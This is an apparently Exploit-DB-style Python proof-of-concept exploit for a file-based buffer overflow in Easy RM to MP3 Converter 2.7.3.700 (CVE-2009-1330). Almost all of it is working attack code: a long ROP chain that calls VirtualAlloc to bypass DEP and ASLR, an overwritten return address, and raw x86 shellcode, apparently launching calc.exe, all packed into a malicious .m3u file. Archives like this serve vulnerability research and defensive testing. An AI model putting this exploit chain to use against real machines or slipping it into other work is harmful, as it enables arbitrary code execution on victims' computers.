
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330

import struct

def create_rop_chain():

	# rop chain generated with mona.py - www.corelan.be
	# added missing parts, and some optimisation by Csaba Fitzl
	rop_gadgets = [

	  #mov 1000 to EDX - Csaba
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x10025a1c,  # XOR EDX,EDX # RETN 
	  0x1002bc3d,  # MOV EAX,411 # RETN
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc4c,  # ADD EAX,100 # POP EBP # RETN 
	  0x41414141,  # Filler (compensate)
	  0x1002dc24,  # ADD EAX,80 # POP EBP # RETN
	  0x41414141,  # Filler (compensate)
	  0x1002dc41,  # ADD EAX,40 # POP EBP # RETN
	  0x41414141,  # Filler (compensate)
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  # AT this point EAX = 0x1000
	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
	  0x41414141,  # Filler (compensate)
	  
	
	  0x10026d56,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0x10032078,  # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
	  0x1002e0c8,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
	   
	  0x1001a788,  # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)
	  0x10027c5a,  # POP EBP # RETN [MSRMfilter03.dll] 
	  0x1001b058,  # & push esp # ret  [MSRMfilter03.dll]
	  0x1002b93e,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0xfffffffb,  # put delta into eax (-> put 0x00000001 into ebx)
	  0x1001d2ac,  # ADD EAX,4 # RETN
	  0x10023327,  # INC EAX # RETN
	  0x10023327,  # INC EAX # RETN
	  0x1001bdee,  # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll] 
	  0x41414141,  # Filler (compensate)
	  0x41414141,  # Filler (compensate)

	  0x10029f74,  # POP ECX # RETN [MSRMfilter03.dll] 
	  0xffffffff,  #  
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002dd3e,  # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll] 
	  0x1002bc6a,  # POP EDI # RETN [MSRMfilter03.dll] 
	  0x1001c121,  # RETN (ROP NOP) [MSRMfilter03.dll]
	  0x10026f2b,  # POP EAX # RETN [MSRMfilter03.dll] 
	  0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
	  0x1002bc07  # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL 

	]
	return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

# --- payload assembly (Python 2 ``str`` semantics: every string below is raw bytes) ---

# Number of padding bytes placed before the overwritten return address
# (see the concatenation order in ``exploit`` below).
buffersize = 26090

junk = "A" * buffersize

# 4-byte overwrite of the saved return address; little-endian 0x10012285,
# annotated by the author as a stack-pivot gadget.
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} :  # ADD ESP,8 # RETN

rop = create_rop_chain()

# Raw x86 machine-code bytes. The name suggests it launches calc.exe;
# that is not verified here — TODO confirm before relying on the name.
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
 

# 16 NOP bytes (0x90) in front of the machine code.
shell = "\x90"*0x10 + calc

# Final file contents: padding, return address, ROP chain, payload, then 'C'
# bytes so that rop + shell + trailer is exactly 1000 bytes. NOTE: if
# len(rop) + len(shell) ever exceeds 1000, 'C' * <negative> is '' and the
# oversize goes unnoticed rather than raising.
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))

# Written in text mode ('w') without a context manager. On Python 2 ``str``
# is bytes so this is a byte-for-byte write; on Windows text mode would
# rewrite any 0x0a byte as 0d 0a — the payload above appears to contain
# none, but re-check if any part of it is changed.
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()